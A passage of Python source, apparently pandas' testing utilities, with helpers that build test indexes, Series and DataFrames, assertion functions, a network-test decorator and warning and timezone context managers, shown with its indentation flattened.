if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, "Did not contain item: '{key!r}'".format(key=k)
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
"Expected object {obj1!r} and object {obj2!r} to be "
"different objects, but they were the same object."
).format(obj1=type(elem1), obj2=type(elem2))
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(np.random.choice(x, k), name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
'"{idx_type}" is not a legal value for `idx_type`, '
'use "i"/"f"/"s"/"u"/"dt/"p"/"td".'.format(idx_type=idx_type)
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = "{prefix}_l{i}_g{j}".format(prefix=prefix, i=i, j=j)
cnt[label] = ndupe_l[i]
# cute Counter trick
result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: "R{rows}C{cols}".format(rows=r, cols=c)
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
Density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
class TestSubDict(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supercedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas.util.testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as e:
errno = getattr(e, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(e.reason, "errno", None)
if errno in skip_errnos:
skip(
"Skipping test due to known errno"
" and error {error}".format(error=e)
)
e_str = str(e)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
"Skipping test because exception "
"message is known and error {error}".format(error=e)
)
if not isinstance(e, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(
"Skipping test due to lack of connectivity"
" and error {error}".format(error=e)
)
return wrapper
with_connectivity_check = network
def assert_raises_regex(_exception, _regexp, _callable=None, *args, **kwargs):
r"""
Check that the specified Exception is raised and that the error message
matches a given regular expression pattern. This may be a regular
expression object or a string containing a regular expression suitable
for use by `re.search()`. This is a port of the `assertRaisesRegexp`
function from unittest in Python 2.7.
.. deprecated:: 0.24.0
Use `pytest.raises` instead.
Examples
--------
>>> assert_raises_regex(ValueError, 'invalid literal for.*XYZ', int, 'XYZ')
>>> import re
>>> assert_raises_regex(ValueError, re.compile('literal'), int, 'XYZ')
If an exception of a different type is raised, it bubbles up.
>>> assert_raises_regex(TypeError, 'literal', int, 'XYZ')
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: 'XYZ'
>>> dct = dict()
>>> assert_raises_regex(KeyError, 'pear', dct.__getitem__, 'apple')
Traceback (most recent call last):
...
AssertionError: "pear" does not match "'apple'"
You can also use this in a with statement.
>>> with assert_raises_regex(TypeError, r'unsupported operand type\(s\)'):
... 1 + {}
>>> with assert_raises_regex(TypeError, 'banana'):
... 'apple'[0] = 'b'
Traceback (most recent call last):
...
AssertionError: "banana" does not match "'str' object does not support \
item assignment"
"""
warnings.warn(
(
"assert_raises_regex has been deprecated and will "
"be removed in the next release. Please use "
"`pytest.raises` instead."
),
FutureWarning,
stacklevel=2,
)
manager = _AssertRaisesContextmanager(exception=_exception, regexp=_regexp)
if _callable is not None:
with manager:
_callable(*args, **kwargs)
else:
return manager
class _AssertRaisesContextmanager:
"""
Context manager behind `assert_raises_regex`.
"""
def __init__(self, exception, regexp=None):
"""
Initialize an _AssertRaisesContextManager instance.
Parameters
----------
exception : class
The expected Exception class.
regexp : str, default None
The regex to compare against the Exception message.
"""
self.exception = exception
if regexp is not None and not hasattr(regexp, "search"):
regexp = re.compile(regexp, re.DOTALL)
self.regexp = regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, trace_back):
expected = self.exception
if not exc_type:
exp_name = getattr(expected, "__name__", str(expected))
raise AssertionError("{name} not raised.".format(name=exp_name))
return self.exception_matches(exc_type, exc_value, trace_back)
def exception_matches(self, exc_type, exc_value, trace_back):
"""
Check that the Exception raised matches the expected Exception
and expected error message regular expression.
Parameters
----------
exc_type : class
The type of Exception raised.
exc_value : Exception
The instance of `exc_type` raised.
trace_back : stack trace object
The traceback object associated with `exc_value`.
Returns
-------
is_matched : bool
Whether or not the Exception raised matches the expected
Exception class and expected error message regular expression.
Raises
------
AssertionError : The error message provided does not match
the expected error message regular expression.
"""
if issubclass(exc_type, self.exception):
if self.regexp is not None:
val = str(exc_value)
if not self.regexp.search(val):
msg = '"{pat}" does not match "{val}"'.format(
pat=self.regexp.pattern, val=val
)
e = AssertionError(msg)
raise_with_traceback(e, trace_back)
return True
else:
# Failed, so allow Exception to bubble up.
return False
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
"File where warning is raised: {actual} != "
"{caller}. Warning message: {message}"
).format(
actual=actual_warning.filename,
caller=caller.filename,
message=actual_warning.message,
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = "Did not see expected warning of class {name!r}.".format(
name=expected_warning.__name__
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
"Caused unexpected warning(s): {!r}.".format(extra_warnings)
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz):
"""Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
